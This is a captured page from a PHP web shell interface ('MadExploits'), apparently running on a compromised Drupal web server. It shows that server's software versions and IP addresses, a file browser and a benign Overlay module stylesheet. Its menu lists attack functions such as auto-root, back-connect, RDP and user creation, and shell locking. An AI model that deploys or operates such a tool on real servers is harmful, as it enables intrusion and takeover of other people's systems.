Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.144.237.52
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
overlay /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
overlay-child-rtl.css
571
B
-rw-r--r--
overlay-child.css
3.27
KB
-rw-r--r--
overlay-child.js
6.54
KB
-rw-r--r--
overlay-parent.css
1.1
KB
-rw-r--r--
overlay-parent.js
37.55
KB
-rw-r--r--
overlay.api.php
1.03
KB
-rw-r--r--
overlay.info
261
B
-rw-r--r--
overlay.install
480
B
-rw-r--r--
overlay.module
35.14
KB
-rw-r--r--
overlay.tpl.php
1.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : overlay-parent.css
/** * @file * Basic styling for the Overlay module. */ html.overlay-open, html.overlay-open body { height: 100%; overflow: hidden; } #overlay-container, .overlay-modal-background, .overlay-element { height: 100%; left: 0; position: absolute; top: 0; width: 100%; z-index: 500; } .overlay-modal-background { /* Using a transparent png renders faster than using opacity */ background: transparent url(images/background.png) repeat; } .overlay-element { background: transparent; left: -200%; z-index: 501; } .overlay-element.overlay-active { left: 0; } html.overlay-open .displace-top, html.overlay-open .displace-bottom { z-index: 600; } /** * Within the overlay parent, the message about disabling the overlay is for * screen-reader users only. It is always kept invisible with the * element-invisible class, and removed from the tab order. Overlay-child.css * contains styling for the same message appearing within the overlay, and * intended for sighted users. */ #overlay-disable-message { display: none; } html.overlay-open #overlay-disable-message { display: block; }
Close